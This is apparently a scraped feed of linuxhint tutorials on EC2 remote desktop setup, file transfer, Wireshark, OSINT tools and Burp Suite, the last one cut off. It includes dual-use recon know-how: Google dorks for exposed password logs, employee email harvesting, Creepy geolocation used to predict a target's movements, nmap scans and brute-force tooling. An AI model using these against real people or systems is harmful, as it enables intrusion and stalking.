There are two different types of interfaces to interact with an operating system: the Graphical User Interface (GUI) and the Command Line Interface (CLI). In the Command Line Interface, we interact with the system directly using system commands in the terminal. We give commands to the system, the system executes operating system functions according to those commands, and we receive responses from the system in the form of plain text. The command-line interface is not commonly used by beginners. It is mostly used by developers and system administrators to configure systems and install packages, as using the Command Line Interface is much faster than using the Graphical User Interface. Also, tasks can be automated by writing simple scripts (bash scripts for Linux and batch scripts for Windows) using the command-line interface. We can perform many more functions using the command-line interface.

With a GUI, we have a nice representation of files and folders in the operating system using icons and indicators. It is much easier for non-professionals to use a graphical user interface instead of a command-line interface.

When you start an Ubuntu EC2 instance in the cloud, by default you only have a command-line interface to interact with the server. For system administrators, it is much easier to configure the machine remotely using the command line, but for developers who are new to the command-line interface, it can be difficult to manage everything that way. They can enable a GUI to use the remote server more easily. In this article, we are going to see how we can enable a graphical user interface on our EC2 instance.

Getting Started

The first step to get started is to have SSH access to the instance. Connect to the instance over SSH using the following command

ubuntu@ubuntu:~$ ssh ubuntu@<IP Address> -i <Key Pair>

Where <IP Address> is the public IP of the instance and <Key Pair> is the Key Pair to connect to the instance. For the Ubuntu EC2 instance, the default user will be ubuntu but if you have changed the username, then use that username instead of ‘ubuntu’ in the above command.

NOTE: Sometimes you see an ‘UNPROTECTED PRIVATE KEY FILE’ error while connecting to the instance; then use the following command before connecting to the instance

ubuntu@ubuntu:~$ sudo chmod 400 <Key Pair>

The above error occurs when your private key file has loose permissions. The above command restricts the private key file to be read-only by the current user.

Installing LXDE

Lightweight X11 Desktop Environment (LXDE) is an open-source software program used to provide a desktop environment to the Unix-like Operating systems. To enable GUI on the Ubuntu EC2 instance, we will use LXDE. LXDE is preferred over other desktop environments like GNOME as it is lightweight and uses fewer system resources than others. Update the system before installing this package

ubuntu@ip-172-31-39-44:~$ sudo apt-get update -y

Install LXDE using the following command

ubuntu@ip-172-31-39-44:~$ sudo apt-get install lxde -y

During installation, it will ask for the display manager configuration. Press the ‘Tab’ key to highlight ‘OK’ and then hit Enter.

Now it will ask you to select either ‘lightdm’ or ‘gdm3’. Both ‘lightdm’ and ‘gdm3’ are display managers, and you have to select one of them. Select ‘lightdm’, as it is ranked 2nd among all the display managers, while ‘gdm3’ is ranked 7th. Use the ‘Tab’, ‘Down’, and ‘Up’ arrow keys to switch between the options in the list.
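
If you later want to switch between the two display managers, you can re-run the selection dialog with a standard Debian/Ubuntu command (not specific to this guide):

ubuntu@ip-172-31-39-44:~$ sudo dpkg-reconfigure lightdm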


After this, the installation will complete, and we will move to the next step.

Installing XRDP

After installing LXDE, we will now install the XRDP package on our Ubuntu instance. XRDP is an open-source package that provides a desktop session on the Ubuntu server, since we cannot have a GUI over SSH alone. It enables the remote desktop protocol on Linux machines. Normally, Linux servers do not come with a pre-installed desktop environment. The following command will install the XRDP package on your Ubuntu instance:

ubuntu@ip-172-31-39-44:~$ sudo apt-get install xrdp -y

Now we can establish a connection between our local system and remote server using the remote desktop protocol.

Set Up Password for User

In order to connect to the remote Ubuntu instance over the remote desktop connection, we should set up a password for the user. By default, we connect with our instance over SSH using the default user ‘ubuntu’ using SSH key pairs. But to connect using the remote desktop protocol, we have to set up a password for the user. The following command will set up a password for the ‘ubuntu’ user.

ubuntu@ip-172-31-39-44:~$ sudo passwd ubuntu

Configure Security Group

The remote desktop protocol works on port 3389, so we have to open that port in the security group of our instance to connect using the remote desktop protocol. (To connect over SSH, we open port 22, the default SSH port.) Without opening port 3389, we cannot connect to our instance using the graphical user interface.
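
If you prefer the AWS CLI over the web console, a rule like the following opens port 3389 (the security group ID here is a placeholder, and allowing 0.0.0.0/0 exposes RDP to the whole internet, so restrict the CIDR where possible):

ubuntu@ubuntu:~$ aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 3389 --cidr 0.0.0.0/0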

Connect to the Instance

Now our Ubuntu instance is ready for a connection using the remote desktop protocol. We can use either Linux or Windows to connect to our instance using RDP. On Ubuntu, type:

ubuntu@ubuntu:~$ rdesktop [IP_Address]

On Windows, search for the ‘Remote Desktop Connection’ client in the Windows search bar and open it. It will ask for the DNS name or IP address and the username.


Use the IP address and username of the Ubuntu instance. You can also save the connection setting to an RDP file to use for later connection. Also, you can use the previously saved settings for this connection to connect to the instance. Now click on ‘connect,’ and it will ask for the password for this user.


Use the password we have already set up, and it will connect with your instance with Graphical User Interface.

Conclusion

Handling remote servers using the command-line interface can be a difficult task for beginners. So, in order to manage remote servers easily, we can configure the Ubuntu server to use the remote desktop protocol and get a nice graphical user interface. In this tutorial, we have enabled a graphical user interface on the Ubuntu instance to make things easier for novice Linux users.

]]>
Multiple Ways to Transfer Files Between Your Computer and Cloud Linux Server https://linuxhint.com/linux-server-file-transfer/ Sat, 28 Nov 2020 19:54:54 +0000 https://linuxhint.com/?p=78458 There are multiple methods you can use to transfer files between your machine and Linux server, some of which we’ll discuss in this article.

  • using the SCP command in SSH
  • using Netcat
  • using FTP
  • using Python’s Simple HTTP Server

Using SCP (SSH)

SCP is a utility used to move files and directories securely via SSH. With the SCP command, you can transfer files from your computer to your Linux server and vice versa. As this utility uses SSH to move files, you’ll need the SSH credential of your server to transfer files.

SSH comes pre-installed on most Linux servers, but if not, you can install and enable it using the following steps.

Open the Ubuntu terminal and type.

$ sudo apt install -y openssh-server
$ sudo service ssh start

Upload files via SCP

The scp command follows this pattern:

$ scp [Options] [Source] [Destination]

To transfer a file from your computer to a Linux server, use a command like this:

$ scp -i key.pem /path/of/your/local/file.ext username@linux-server-IP:/path/of/file.ext

In the above command, first, you give the path of the file you want to copy from your computer to the Linux server, then the username and IP address of the Linux server, and the path where you want to copy the file on the Linux server, following this pattern: (username@remote-server-IP:/path/of/remote/file.ext).

After running this command, it will require the password of the Linux server user account

$ username@remote-server’s password :

After entering the password, the file will be uploaded.

Download files via SCP

To download files from the Linux server to your computer, you need to provide SCP with the remote path of the file or directory on the Linux server and the local path where you want the file to be saved.

$ scp username@linux-server-ip:/path/of/file.ext  /path/to/destination

After running this command, it will require the authentication password of the linux server. Once you have entered the password, then the file will be copied safely to your computer.

SCP Command-Line Options

You can use different flags (known as command-line options) in the SCP command.

The -P flag (capital P) is used to change the port. By default, SSH uses port 22, but with the -P flag, we can use another port, like 2222.

$ scp -P 2222 /path/of/your/local/file.ext username@linux-server-ip:/path/of/file.ext

-r flag is used to copy the folder and all of its content.

$ scp -r /path/of/your/local/folder username@linux-server-ip:/path/of/folder

The -i flag is used to authenticate the connection using a cryptographic key pair stored in a file instead of a username and password.

$ scp -i key.pem /path/of/your/local/file.ext username@linux-server-ip:/path/of/file.ext

The -C flag (capital C) is used to compress the data while it is being transferred.

$ scp -C /path/of/your/local/file.ext username@linux-server-ip:/path/of/file.ext

The -q flag is used to suppress non-error messages and the progress meter.

$ scp -q /path/of/your/local/file.ext username@linux-server-ip:/path/of/file.ext

Transfer Files Using Netcat

Netcat is a Linux utility used for raw TCP/IP communication, transferring files, port scanning, network troubleshooting, etc. It comes pre-installed in many Linux-based systems, and it is mainly used by network administrators.

If not already installed, you can install Netcat by typing the following command

$ sudo apt-get install netcat

To transfer files using Netcat, you have to type these commands. Put the netcat server into listening mode on any port, e.g. 4747, and give it the path of the file you want to send.

$ nc -l -p 4747 < path/of/file.ext

On the receiving host, run the following command.

$ nc sending-server.url.com 4747 > path/of/file.ext

Note: The sending server uses the less-than sign ‘<’ in its command, while the receiving computer uses ‘>’ in its netcat command.

You can also transfer directories. Set the receiving host to listen on a port, e.g. 4747, and extract the incoming archive:

$ nc -l -p 4747 | tar xzvf - -C /path/of/directory

From the sending host, pipe the directory into netcat, pointed at the receiving host listening on that port:

$ tar czvf - /path/of/directory | nc receiving-host.url.com 4747

The directory will be transferred. To close the connection, press CTRL+C

Transfer Files Using FTP

FTP (file transfer protocol) is used to transfer files between computers or clients and servers. It is faster than HTTP and other protocols in terms of file transfer because it is specifically designed for this purpose. It allows you to transfer multiple files and directories, and if there is any interruption in the connection during the transfer, the file will not be lost. Instead, it will resume transferring where it got dropped.

You can install an FTP server like vsftpd using apt by running this command.

$ sudo apt install -y vsftpd

After the package has been installed, you have to start the service by typing.

$ sudo systemctl start vsftpd
$ sudo systemctl enable vsftpd

Then you can connect to the FTP server by typing the command FTP and the IP address.

$ ftp [IP_Address]

It will ask you the username and password of the FTP server. After you have entered the username and password, you will be connected to your FTP server.

You can list out all the contents of the server by executing this command.

ftp> ls

Download via FTP

If you want to download any file from the FTP server, then you can get it by typing the command.

ftp> get  path/of/file

The file will be downloaded. You can also use wildcards to download multiple files in a directory. For example:

ftp> mget  *.html

It will download all the files with the “.html” extension.

You can also set up a local directory for downloaded files from the FTP server by using the lcd command.

ftp> lcd  /home/user/directory-name

Upload files via FTP

To upload files on the FTP server, type the following command.

ftp> put  path/of/local/file

The file will be uploaded to the FTP server. To upload multiple files, type commands.

ftp> mput  *.html

It will upload all the files with the “.html” extension.

Downloading files using Python

Python has a module called ‘http.server’ that can serve files over HTTP, but with it, you can only download files.

If you don’t have Python installed, type the following command:

$ sudo apt install -y python3

To start the Python server, use this command:

$ python3 -m http.server 4747    # port e.g. 4747

Now the python server is listening on port 4747.

Go to your web browser and type the IP address and port no. on which the python server is listening.

http://IP_Address:4747/

A page will open containing all the files and directories served by the Python server. You can browse into any directory and download the files.
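
You can also fetch a file directly from the command line instead of using the browser (the file path here is a placeholder):

$ wget http://IP_Address:4747/path/of/file.ext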

Conclusion

SCP, Netcat, FTP, and Python are commonly used methods to transfer files. All of the above methods of transferring files and directories are fast, reliable, and widely used today. There are many other techniques as well; you can adopt whichever method you prefer.

]]>
WireShark in-depth Tutorial https://linuxhint.com/wireshark-in-depth-tutorial/ Tue, 24 Nov 2020 17:16:56 +0000 https://linuxhint.com/?p=78142 Wireshark is an open-source and free network traffic inspection tool. It captures and displays packets in real-time for offline analysis in a human-readable format with microscopic details. It requires some sound knowledge of basic networking and is considered an essential tool for system administrators and network security experts.

Wireshark is the de-facto go-to tool for several network problems that vary from network troubleshooting, security issue examination, inspecting network traffic of a suspicious application, debugging protocol implementations, along with network protocol learning purposes, etc.

The Wireshark project was initiated in 1998. Thanks to the voluntary contributions of global networking experts, it continues to be updated for new technologies and encryption standards. Hence, it’s by far one of the best packet analyzer tools and is utilized as a standard commercial tool by various government agencies, educational institutes, and non-profit organizations.

The Wireshark tool is composed of a rich set of features. Some of them are the following:

  • Multiplatform: it is available for Unix, Mac, and Windows systems.
  • It captures packets from various network media, i.e., Wireless LAN, Ethernet, USB, Bluetooth, etc.
  • It opens packet files captured by other programs such as Oracle snoop and atmsnoop, Nmap, tcpdump, Microsoft Network Monitor, SNORT, and many others.
  • It saves and exports captured packet data in various formats (CSV, XML, plaintext, etc.).
  • It provides decryption support for protocols including SSL, WPA/WPA2, IPsec, and many others.
  • It includes capture and display filters.

However, Wireshark won’t warn you of any malicious activity. It will only help you inspect and identify what is happening on your network. Moreover, it will only analyze network protocol/activities and won’t perform any other activity like sending/intercepting packets.

This article provides an in-depth tutorial that begins with the basics (i.e., filtering, Wireshark network layers, etc.) and takes you into the depth of traffic analysis.

Wireshark Filters

Wireshark comes with powerful filter engines, Capture Filters and Display Filters, to remove noise from the network or from already captured traffic. These filters remove unwanted traffic and display only the packets that you want to see. This feature helps network administrators troubleshoot the problems at hand.

Before going into the details of filters: in case you are wondering how to capture network traffic without any filter, you can either press Ctrl+E or go to the Capture option on the Wireshark interface and click Start.

Now, let’s dig deep into the available filters.

Capture Filter

Wireshark provides support in reducing the size of a raw packet capture by allowing you to use a Capture Filter. But it only captures the packet traffic that matches the filter and disregards the rest of it. This feature helps you monitor and analyze the traffic of a specific application using the network.

Do not confuse this filter with display filters: it is not a display filter. This filter appears in the main window and needs to be set before starting the packet capture. Moreover, you cannot modify this filter during the capture.

You can go to the Capture option of the interface and select Capture Filters.

You will be prompted with a window, as shown in the snapshot. You can choose any filter from the list of filters or add/create a new filter by clicking on the + button.

Examples of the list of helpful Capture Filters:

  • host ip_address – captures traffic only to and from the specified IP address
  • net 192.168.0.0/24 – captures traffic between IP address ranges/CIDRs
  • port 53 – captures DNS traffic
  • tcp portrange 2051-3502 – captures TCP traffic from port range 2051-3502
  • port not 22 and not 21 – capture all the traffic except SSH and FTP

Display Filter

Display filters allow you to hide some packets from the already captured network traffic. These filters can be added above the captured list and can be modified on the fly. You can now control and narrow down the packets you want to concentrate on while hiding the unnecessary packets.

You can add filters in the display filter toolbar right above the first pane containing packet information. This filter can be used to display packets based on protocol, source IP address, destination IP address, ports, value and information of fields, comparison between fields, and a lot more.

That’s right! You can build a combination of filters using logical operators like ==, !=, ||, &&, etc.

Some examples of display filters of a single TCP protocol and a combination filter are shown below:
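
For illustration (the addresses and ports here are placeholders), a few typical display filters are:

  • tcp – shows only TCP packets
  • tcp.port == 80 – TCP traffic to or from port 80
  • ip.src == 192.168.1.10 && tcp.flags.syn == 1 – SYN packets coming from a single host
  • http.request.method == "GET" – only HTTP GET requests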

Network Layers in Wireshark

Other than packet inspection, Wireshark presents the OSI layers, which aid in the troubleshooting process. Wireshark shows the layers in reverse order:

  1. Physical Layer
  2. Data Link Layer
  3. Network Layer
  4. Transport Layer
  5. Application Layer

Note that Wireshark does not always show the Physical layer. We will now dig into each layer to understand the important aspects of packet analysis and what each layer presents in Wireshark.

Physical Layer

The Physical layer, as shown in the following snapshot, presents the physical summary of the frame, such as hardware information. As a network administrator, you do not generally extract information from this layer.

Data Link Layer

The next layer, the data link layer, contains the source and destination network card addresses. It is relatively simple, as it only delivers the frame from the laptop to the router, or to the next adjacent node on the physical medium.

Network Layer

The network layer presents the source and destination IP addresses, IP version, header length, total packet length, and loads of other information.

Transport Layer

In this layer, Wireshark displays information about the transport layer, which consists of the SRC port, DST port, header length, and sequence number that changes for each packet.

Application Layer

In the final layer, you can see what type of data is being sent over the medium and which application is being used, such as FTP, HTTP, SSH, etc.

Traffic Analysis

ICMP Traffic Analysis

ICMP is used for error reporting and testing, determining whether data reaches the intended destination on time. The ping utility uses ICMP messages to test connectivity between devices and reports how long a packet takes to reach its destination and come back.

Ping sends an ICMP echo request message to a device on the network, and the device responds with an ICMP echo reply message. To capture these packets, start the Capture function in Wireshark, open a terminal, and run the following command:

ubuntu@ubuntu:~$ ping google.com

Use Ctrl+C to terminate the ping command in the terminal, then stop the capture in Wireshark. In the snapshot below, you can see that the number of ICMP packets sent equals the number received, with 0% packet loss.

In the Wireshark capture pane, select the first ICMP_echo_request packet and observe the details by opening the middle Wireshark pane.

In the Network layer, notice that the source (Src) is my IP address, whereas the destination (Dst) is the IP address of the Google server, and the IP header identifies the protocol as ICMP.

Now, we zoom into the ICMP packet details by expanding Internet Control Message Protocol and decode the highlighted boxes in the snapshot below:

  • Type: 8-bit field set to 8, which means Echo request message
  • Code: always zero for ICMP echo packets
  • Checksum: 0x46c8
  • Identifier Number (BE): 19797
  • Identifier Number (LE): 21837
  • Sequence Number (BE): 1
  • Sequence Number (LE): 256

The identifier and the sequence numbers are matched to aid in identifying the replies to echo requests. Similarly, before packet transmission, the checksum is computed and added to the field to be compared against the checksum in the received data packet.
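The big-endian (BE) and little-endian (LE) values shown above are simply two readings of the same two bytes. The short Python sketch below reproduces both numbers, assuming the raw identifier bytes 0x4d55 from this capture (your own capture will contain different bytes):

>>> import struct
>>> raw = bytes.fromhex('4d55')   # raw identifier bytes from the capture
>>> struct.unpack('>H', raw)[0]   # big-endian (network byte order)
19797
>>> struct.unpack('<H', raw)[0]   # little-endian reading of the same bytes
21837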

Now, in the ICMP reply packet, notice the IPv4 layer. The source and destination addresses have swapped.

In the ICMP layer, verify and compare the following important fields:

  • Type: 8-bit field set to 0, which means Echo reply message
  • Code: always 0 for ICMP echo packets
  • Checksum: 0x46c8
  • Identifier Number (BE): 19797
  • Identifier Number (LE): 21837
  • Sequence Number (BE): 1
  • Sequence Number (LE): 256

You can notice that the ICMP reply echoes the same request checksum, identifier, and sequence number.

HTTP Traffic Analysis

HTTP, the Hypertext Transfer Protocol, is an application layer protocol. It is used by the World Wide Web and defines the rules by which HTTP clients and servers transmit and receive HTTP commands. The most commonly used HTTP methods are POST and GET:

POST: this method is used to send data, such as confidential form contents, in the request body so that it does not appear in the URL; note that it is not encrypted unless HTTPS is used.

GET: this method is used to retrieve data from a web server, with any parameters appearing in the URL.

Before we dig deeper into HTTP packet analysis, we will first briefly demonstrate the TCP three-way-handshake in Wireshark.

TCP Three-Way-Handshake

In a three-way handshake, the client initiates a connection by sending a SYN packet and receives a SYN-ACK response from the server, which the client then acknowledges with an ACK. We will use the Nmap TCP connect scan to illustrate the TCP handshake between client and server.

ubuntu@ubuntu:~$ nmap -sT google.com

In the Wireshark packet capture pane, scroll to the top of the window to notice the various three-way handshakes established on particular ports.

Use the tcp.port == 80 filter to see if the connection is established via port 80. You can notice the complete three-way-handshake, i.e., SYN, SYN-ACK, and ACK, highlighted at the top of the snapshot, illustrating a reliable connection.
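If the capture contains a lot of traffic, the handshake packets can also be isolated with flag-based display filters, for example:

  • tcp.flags.syn == 1 && tcp.flags.ack == 0 – shows only the initial SYN packets
  • tcp.flags.syn == 1 && tcp.flags.ack == 1 – shows only the SYN-ACK responses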

HTTP Packet Analysis

For HTTP packet analysis, go to your browser, open a page served over plain HTTP, and download a file such as a PDF user's guide (the walkthrough here used http://www.wafflemaker.com). In the meantime, Wireshark must be capturing all the packets.

Apply an HTTP filter and look for the HTTP GET request sent to the server by the client. To view an HTTP packet, select it, and expand the application layer in the middle pane. There can be a lot of headers in a request, depending upon the website and browser as well. We will analyze the headers present in our request in the snapshot below.

  • Request Method: the HTTP request method is GET
  • Host: identifies the name of the server
  • User-Agent: informs about the client-side browser type
  • Accept, Accept-Encoding, Accept-language: informs the server about the file type, accepted encoding at the client-side, i.e., gzip, etc., and the accepted language
  • Cache-Control: shows how the requested information is cached
  • Pragma: a legacy cache-control directive (for example, no-cache); any cookies the browser holds for the website are sent in a separate Cookie header
  • Connection: header that controls whether the connection stays open after the transaction

In the HTTP OK packet from server to client, observing the information in the Hypertext Transfer Protocol layer shows “200 OK“. This information indicates a normal successful transfer. In the HTTP OK packet, you can observe different headers in comparison to the HTTP GET packet. These headers contain information about the requested content.

  • Response Version: informs about the HTTP version
  • Status Code, Response Phrase: sent by the server
  • Date: the date and time at which the server generated the response
  • Server: server details (Nginx, Apache, etc.)
  • Content-type: type of content (json, txt/html, etc.)
  • Content-length: total length of content; our file is 39696 bytes

In this section, you have learned how HTTP works and what happens whenever we request content on the web.
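To isolate these request and response packets quickly in a busy capture, display filters such as the following can be applied:

  • http.request.method == "GET" – shows only HTTP GET requests
  • http.response.code == 200 – shows only responses with the 200 OK status code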

Conclusion

Wireshark is the most popular and powerful network sniffer and analysis tool. It is widely used in day-to-day packet analysis tasks in various organizations and institutes. In this article, we have studied some beginner to intermediate level topics of Wireshark on Ubuntu. We have learned the types of filters offered by Wireshark for packet analysis. We have covered the network layer model in Wireshark and performed in-depth ICMP and HTTP packet analysis.

However, learning and understanding the various aspects of this tool is a long journey. Hence, there are many other online lectures and tutorials available to help you with specific Wireshark topics. You can follow the official user guide available on the Wireshark website. Moreover, once you have built a basic understanding of protocol analysis, it is also advisable to use a tool like Varonis that points you to potential threats and then use Wireshark to investigate them for better understanding. ]]> OSINT Tools and Techniques https://linuxhint.com/osint-tools-and-techniques/ Tue, 24 Nov 2020 13:31:56 +0000 https://linuxhint.com/?p=78024 OSINT, or Open Source Intelligence, is the collection and analysis of data from distributed, freely accessible sources such as the Internet. The data is available in different forms, including text, documents, and images. OSINT is a technique used by intelligence and security companies to gather information. This article provides a look at some of the most useful OSINT tools and techniques.

Maltego

Maltego was created by Paterva and is utilized by law enforcement, security experts, and social engineers for gathering and dissecting open-source information. It can gather large amounts of information from various sources and utilize different techniques to produce graphical, easy-to-read results. Maltego provides a transform library for the exploration of open-source data and represents that data in a graphical format suitable for relation analysis and data mining. These transforms are built in and can likewise be customized, depending on your needs.

Maltego is written in Java and runs on all major operating systems. It comes pre-installed in Kali Linux. Maltego is widely used because of its pleasant and easy-to-understand entity-relationship model that represents all the relevant details. The key purpose of this application is to investigate real-world relationships between people, web pages or domains of organizations, networks, and internet infrastructure. The application may also focus on the connections between social media accounts, open-source intelligence APIs, self-hosted private data, and computer network nodes. With integrations from different data partners, Maltego expands its data reach to an incredible extent.

Recon-ng

Recon-ng is a reconnaissance tool with an interface similar to Metasploit. When recon-ng is run from the command line, you enter a shell-like environment in which you can configure options, run modules, and generate reports in different formats. The virtual console of Recon-ng offers a variety of helpful features, such as command completion and contextual help. If you want to hack something, use Metasploit; if you want to gather public information, use the Social Engineering Toolkit and Recon-ng to carry out reconnaissance.

Recon-ng is written in Python, and its independent modules, key management, and other features are mainly geared toward data collection. The tool is preloaded with several modules that use online search engines, plugins, and APIs to assist in collecting information about the target. Recon-ng automates time-consuming OSINT chores, such as cutting and pasting. Recon-ng does not claim to carry out all OSINT collection, but it can automate many of the more common forms of harvesting, leaving more time for the work that still needs to be done manually.

Use the following command to install recon-ng:

ubuntu@ubuntu:~$    sudo apt install recon-ng
ubuntu@ubuntu:~$    recon-ng

To list the available commands, use the help command:

Suppose we need to gather some subdomains of a target. We will use a module named "hackertarget" to do so.

[recon-ng][default] > load hackertarget
[recon-ng][default][hackertarget] > show options
[recon-ng][default][hackertarget] > set SOURCE google.com
[recon-ng][default][hackertarget] > run

Now, the program will gather related information and show all the subdomains of the target set.

Shodan

To find anything on the Internet, especially the Internet of Things (IoT), the optimum search engine is Shodan. While Google and other search engines index only web content, Shodan indexes almost everything else connected to the Internet: webcams, water supply systems, private jets, medical equipment, traffic lights, power plants, license plate readers, smart TVs, air conditioners, and anything else you may think of that is wired into the internet. The greatest benefit of Shodan lies in helping defenders locate vulnerable machines on their own networks. Let us look at some examples:

  • To find Apache servers in Hawaii:
    apache city:"Hawaii"
  • To find Cisco devices on a given subnet:
    cisco net:"214.223.147.0/24"

You can find things like webcams, default passwords, routers, traffic lights, and more with simple searches, as it is simpler, clearer, and easier to use.
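The same searches can also be run through Shodan's official Python library. The following is a minimal sketch, assuming the library is installed with pip install shodan and YOUR_API_KEY is replaced with the API key from your Shodan account:

>>> import shodan
>>> api = shodan.Shodan('YOUR_API_KEY')
>>> results = api.search('apache city:"Hawaii"')
>>> print(results['total'])                # number of matching hosts
>>> for match in results['matches'][:5]:   # show the first few results
...     print(match['ip_str'], match['port'])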

Google Dorks

Google hacking, or Google dorking, is a hacking tactic that utilizes Google Search and other Google apps to identify security flaws in a website’s configuration and machine code. “Google hacking” involves using specialized Google search engine operators to find unique text strings inside search results.
Let us explore some examples of using Google dorks to locate private information on the Internet. One technique is identifying .LOG files that are unintentionally exposed on the internet. A .LOG file contains clues about what system passwords could be or the different system user or admin accounts that could exist. Upon typing the following query in your Google search box, you will find a list of sites with exposed .LOG files from before the year 2017:

allintext:password filetype:log before:2017

The following search query will find all the web pages that contain the specified text:

intitle:admbook intitle:Fversion filetype:php

Some other very powerful search operators include the following; a combined example is shown after the list:

  • inurl: searches for the specified terms in the URL
  • filetype: searches for specific file types
  • site: limits the search to a single site
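These operators can also be chained together. For example, the following illustrative query (example.com is only a placeholder) restricts results to PDF files on a single domain whose URLs contain the word report:

site:example.com filetype:pdf inurl:report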

Spyse

Spyse is a cybersecurity search engine that can be used to quickly find internet assets and conduct external reconnaissance. The advantage of Spyse is partly due to its database methodology, which avoids the issue of long scanning times on queries for data collection. With several services operating at the same time, and reports that can take a very long time to return, cybersecurity specialists know how inefficient scanning can be. This is the main reason why cybersecurity professionals are shifting towards this awesome search engine. The Spyse archive holds over seven billion important data documents that can be downloaded instantly. Using 50 high-performance servers with data split into 250 shards, consumers can profit from the biggest scalable online database available.

In addition to supplying raw data, this cyberspace search engine also focuses on demonstrating the relationship between various areas of the Internet.

The Harvester

The Harvester is a Python-based utility. Using this program, you can obtain information, such as email addresses, sub-domains, hosts, employee names, open ports, and banners, from numerous public sources, including search engines, PGP key servers, and the SHODAN device database. If you want to determine what an intruder can see of a company, this tool is useful. It ships with Kali Linux by default; on Ubuntu, install it with the following command:

ubuntu@ubuntu:~$ sudo apt-get install theharvester

The basic syntax of The Harvester is as follows:

ubuntu@ubuntu:~$ theharvester -d [domainName] -b [searchEngineName / all][parameters]

Here, -d is the company name or the domain you want to search, and -b is the data source, such as LinkedIn, Twitter, etc. To search emails, use the following command:

ubuntu@ubuntu:~$ theharvester.py -d Microsoft.com -b all

The ability to search for virtual hosts is another fascinating feature of The Harvester. Through DNS resolution, the application checks whether several hostnames are associated with a certain IP address. This knowledge is very important because the security of a single host on that IP depends not just on its own level of security but also on how securely the other hosts sharing the same IP are configured. In fact, if an attacker breaches one of them and gains access to the server, the attacker can more easily reach every other host.

SpiderFoot

SpiderFoot is a platform used for capturing IPs, domains, email addresses, and other analysis objectives from multiple data outlets, including platforms such as “Shodan” and “Have I Been Pwned,” for Open Source Information and vulnerability detection. SpiderFoot can be used to simplify the OSINT compilation process of finding information about the target by automating the gathering process.

To automate this process, Spiderfoot searches over 100 sources of publicly available information and manages all classified intel from the various sites, email addresses, IP addresses, networking devices, and other sources. Simply specify the goal, pick the modules to run, and Spiderfoot will do the rest for you. For example, Spiderfoot can gather all the data necessary to create a complete profile on a subject you are studying. It is multiplatform, has a cool web interface, and supports 100+ modules. Install the Python dependencies listed below to set up SpiderFoot:

ubuntu@ubuntu:~$    sudo apt install python3-pip
ubuntu@ubuntu:~$    pip3 install lxml netaddr M2Crypto cherrypy mako requests bs4

Creepy

Creepy is an open-source intelligence platform for geolocation. Using various social networking sites and image hosting services, Creepy gathers location tracking information. Creepy then displays the reports on a map, with search based on the precise location and time. You can later view the results in depth by exporting them in CSV or KML format. Creepy is written in Python, and its source code is available on GitHub. You can install this awesome tool by visiting the official website:
http://www.geocreepy.com/

There are two main functionalities of Creepy, specified by two specific tabs in the interface: the “mapview” tab and the “targets” tab. This tool is very useful for security personnel. You can easily predict the behavior, routine, hobbies, and interests of your target using Creepy. A small piece of information that you know may not be of much importance, but when you see the complete picture, you can predict the next move of the target.

Jigsaw

Jigsaw is used to obtain knowledge about workers in a company. This platform performs well with large organizations, such as Google, Yahoo, LinkedIn, MSN, Microsoft, etc., where we can easily pick up one of their domain names (say, microsoft.com), and then compile all the emails from their staff in the various divisions of the given company. The only downside is that these requests are launched against the Jigsaw database hosted at jigsaw.com, so we depend solely on the knowledge inside their database that they allow us to explore. You can obtain information about major corporations, but you might be out of luck if you are investigating a less-famous startup company.

Nmap

Nmap, which stands for Network Mapper, is unarguably one of the most prominent and popular network scanning and reconnaissance tools. Nmap builds on previous network monitoring tools to provide quick, comprehensive scans of networks and hosts.

To install nmap, use the following command:

ubuntu@ubuntu:~$ sudo apt install nmap

Nmap is available for all major operating systems and comes pre-installed with Kali. Nmap operates by sending IP packets to detect the hosts and IPs active on a network, and then examining the responses to determine details about each host and IP, as well as the operating systems they are running.

Nmap is used to scan small business networks, enterprise-scale networks, IoT devices and traffic, and connected devices. This would be the first program an attacker would use to attack your website or web application. Nmap is a free and open-source tool used on local and remote hosts for vulnerability analysis and network discovery.

The main features of Nmap include port detection (to make sure you know the potential utilities running on a specific port), operating system detection, IP info detection (including MAC addresses and device types), disabling DNS resolution, and host detection. Nmap identifies the active hosts through a ping scan, i.e., by using the command nmap -sP 192.100.1.1/24, which returns a list of active hosts and assigned IP addresses. The scope and abilities of Nmap are extremely large and varied. The following include some of the commands that can be used for a basic port scan:

For a basic scan, use the following command:

ubuntu@ubuntu:~$    nmap <target_ip>

For banner grabbing and service version detection scans, use the following command:

ubuntu@ubuntu:~$    nmap -sV -sC <target_ip>

For Operating System detection and aggressive scans, use the following command:

ubuntu@ubuntu:~$    nmap -A -O <target_ip>

Conclusion

Open Source Intelligence is a useful technique that you can use to find out almost anything on the Web. Having knowledge of OSINT tools is a good thing, as it can have great implications for your professional work. There are some great projects that are using OSINT, such as finding lost people on the Internet. Out of numerous Intelligence sub-categories, Open Source is the most widely used because of its low cost and extremely valuable output.

]]>
Using Burp for Automated Attacks https://linuxhint.com/using-burp-for-automated-attacks/ Mon, 09 Nov 2020 10:16:08 +0000 https://linuxhint.com/?p=76317

Burp Suite

Burp Suite is a feature-rich web application attack tool designed by PortSwigger. It is equipped with everything needed to perform a successful pentest against a web application. Burp is the world's most widely used web application tester and scanner, with over 40,000 active users, thanks to its easy-to-use interface and depth. It is already an awesome web application pentesting tool, and its capabilities can be further extended by adding extensions or add-ons called BApps.

Burp’s major features are as follows:

  • The ability to intercept HTTP requests. Normally, a request goes from the browser to the server and the server returns the response; with Burp's core feature, the "Intercepting Proxy", the request is interrupted midway and goes from the user's browser to Burp, and then on to the server.
  • The ability to map the target web application using the "Spider" tool. This gathers the list of endpoints and crawls through them in order to find vulnerabilities.
  • An advanced web application scanner for automating the detection of vulnerabilities in the target (available only in the PRO version).
  • An "Intruder" tool for automated attacks, such as brute-forcing a web application's login page, dictionary attacks, and fuzzing the web application to find vulnerabilities.
  • A "Repeater" tool for manipulating user-supplied values or requests and observing their behavior in order to find potentially vulnerable vectors.
  • A “Sequencer” tool for testing session tokens.
  • A “Decoder” tool for decoding and encoding numerous encoding schemes like base64, HEX, etc.
  • The ability to save the work and resume later (available only in PRO version).

Installation

Burp Suite can be downloaded from the official PortSwigger website:

https://portswigger.net/burp/communitydownload.

Burp is available to download for almost every operating system, including Windows, Linux, and macOS. By clicking on the Download Latest Version option, you will be redirected to a download page offering different editions and operating systems, i.e., Community Edition or Professional Edition. The Professional edition is paid, with prices listed on the official website. Download the Community edition, and you are ready to use its basic yet awesome features.

Usage

In order to use Burp, it needs to be configured to intercept HTTP requests. To configure browsers, i.e., Chrome, Firefox, etc., we have to follow the steps given below:

For configuring Chrome to work with Burp

